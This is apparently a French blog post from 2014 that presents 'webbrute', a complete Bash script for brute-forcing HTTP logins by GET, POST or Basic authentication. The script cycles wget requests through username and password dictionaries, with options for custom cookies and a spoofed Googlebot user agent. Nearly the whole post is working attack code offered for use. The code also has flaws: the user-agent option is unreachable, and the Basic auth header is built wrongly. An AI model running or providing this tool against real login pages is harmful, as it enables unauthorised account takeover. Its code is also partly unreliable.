Cet article présente un script Bash de bruteforce sur le protocol HTTP via les méthodes GET/POST & BASIC
0x01. WEBBRUTE
#!/bin/bash # # Settings, do not edit this, variables can be set using parameters # APP="webbrute" VERBOSE=0 tmp="/tmp/.wget.bf" V="\\e[1;32m" Y="\\e[1;33m" B="\\e[1;29m" N="\\e[0m" P="0" # 0 to match, 1 to not match # # Synopsis # function usage { echo " Usage : $APP <-u url> <-d get-data> <-f dictionary> <-p pattern> [-c cookie] [-v] [-i] [-P|-B] [-U useragent] -d GET/POST data -f dictionary file -p pattern to match -i mismatch patter instead of match -c cookie data -v verbose -P use post instead of get method -B use basic authenticaton instead of get method -U set useragent, default is : 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' Exemple: $APP -u 'http://localhost/bfme.php' -u 'http://192.168.0.1' -d 'pass=FUZZPASS' -f passwords.lst -p BIENVENUE > GET authentication bruteforce, using one field $APP -u 'http://localhost/bfme.php' -u 'http://192.168.0.1' -d 'admin=FUZZUSER&pass=FUZZPASS&submit=Login' -f passwords.lst,usernames.lst \\ -p Incorrect -i -c 'PHPSESSID=123456789; Date=123456789;' -P -U 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' > POST athentication bruteforce (-P), too file are needed to brutefroce login/pass (passwords.lst,usernames.lst), if not match (-i) Incorrect then login success, use custom cookie and custom useragent " exit $1 } [ $# -eq 0 ] && usage 0 [ $# -gt 15 ] && usage 1 [ $# -lt 8 ] && usage 1 # Empty values ... data="" ; url="" ; file="" ; pattern="" ; cookie="" # Default action : GET post=0 ; basic=0 # Default useragent useragent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" # Number of words i=0 # Parse arguments while getopts "d:u:f:p:c:ihvwPBU:" option do case $option in d) data=$OPTARG ;; u) url=$OPTARG ;; f) file=$OPTARG ;; p) pattern=$OPTARG ;; c) cookie="--header 'Cookie: $OPTARG'" ;; v) VERBOSE=1 ;; i) P="1" ;; P) post=1 ; basic=0 ;; B) basic=1 ; post=0 ;; u) useragent=$OPTARG ;; h) usage 0 ;; esac done # # Parse data # F=0 field_user=$(echo $data |grep -oE "([a-z]){1,}=FUZZUSER" |cut -d'=' -f1) [ -z $field_user ] && F=1 field_pass=$(echo $data |grep -oE "([a-z]){1,}=FUZZPASS" |cut -d'=' -f1) [ ! -z $field_user ] && [ ! -z $field_pass ] && F=2 field_data=$(echo $data |cut -d'&' -f3-) [ $F -eq 0 ] && usage 1 [ $basic -eq 1 ] && action="BASIC" [ $post -eq 1 ] && action="POST" [ $basic -eq 0 -a $post -eq 0 ] && action="GET" # # Bruteforce one field : pass # if [ $F -eq 1 ] ; then numline=$(cat -b $file |awk {'print $1'} |grep -oE "^([0-9]){1,}" |tail -n 1) echo while read BF_PASS do i=$((i+1)) printf "\\r[$action] Tried : %5s passes / %5s " "$i" "$numline" [ $VERBOSE -ne 0 ] && printf "\\t $field_user= %-20s $field_pass= %-30s" "$BF_USER" "$BF_PASS" if [ $post -eq 1 ]; then wget -q --user-agent "$useragent" $cookie --post-data="$field_pass=$BF_PASS&$field_data" "$url" -O -|\\ grep -iE "$pattern" >/dev/null 2>&1 ; e=$? elif [ $basic -eq 1 ]; then B64_DATA=$(printf "$BF_PASS"|base64) wget -q --user-agent "$useragent" $cookie --header="Authorization: Basic $B64_DATA" "$url" -O -|\\ grep -iE "$pattern" >/dev/null 2>&1 ; e=$? else wget -q --user-agent "$useragent" $cookie "$url?$field_pass=$BF_PASS&$field_data" -O -|\\ grep -iE "$pattern" >/dev/null 2>&1 ; e=$? fi if [ $e -eq $P ] ; then [ $i -eq 1 ] && printf "\\n\\n$Y""Warning: potential wrong positive detected. Please check arguments.$N" printf "\\n\\nFound: $B$field_pass$N = $V $BF_PASS$N\\n\\n" break fi done < $file fi # # Bruteforce two fields : user & pass # if [ $F -eq 2 ] ; then file_user=$(echo $file|cut -d',' -f1) file_pass=$(echo $file|cut -d',' -f2) num_user=$(cat -b $file_user|tail -n1|awk '{ print $1 }') num_pass=$(cat -b $file_pass|tail -n1|awk '{ print $1 }') numline=$((num_user*num_pass)) echo while read BF_USER do while read BF_PASS do i=$((i+1)) printf "\\r[$action] Tried : %5s passes / %5s " "$i" "$numline" [ $VERBOSE -ne 0 ] && printf "\\t $field_user= %-20s $field_pass= %-30s" "$BF_USER" "$BF_PASS" if [ $post -eq 1 ]; then wget -q --user-agent "$useragent" $cookie --post-data="$field_user=$BF_USER&$field_pass=$BF_PASS&$field_data" "$url" -O -|\\ grep -iE "$pattern" >/dev/null 2>&1 ; e=$? elif [ $basic -eq 1 ]; then B64_DATA=$(printf "$field_user=$BF_USER&$field_pass=$BF_PASS"|base64) wget -q --user-agent "$useragent" $cookie --header="Authorization: Basic $B64_DATA" "$url" -O -|\\ grep -iE "$pattern" >/dev/null 2>&1 ; e=$? else wget -q --user-agent "$useragent" $cookie "$url?$field_user=$BF_USER&$field_pass=$BF_PASS&$field_data" -O -|\\ grep -iE "$pattern" >/dev/null 2>&1 ; e=$? fi if [ $e -eq $P ] ; then [ $i -eq 1 ] && printf "\\n\\n$Y""Warning: potential wrong positive detected. Please check arguments.$N" printf "\\n\\nFound: $B$field_user$N = $V $BF_USER$N \\t $B$field_pass$N = $V $BF_PASS$N\\n\\n" exit fi done < $file_pass done < $file_user fi # # Nice style # printf "\\n\\n"
=> Écrit par : Nicolas, le 07 juillet 2014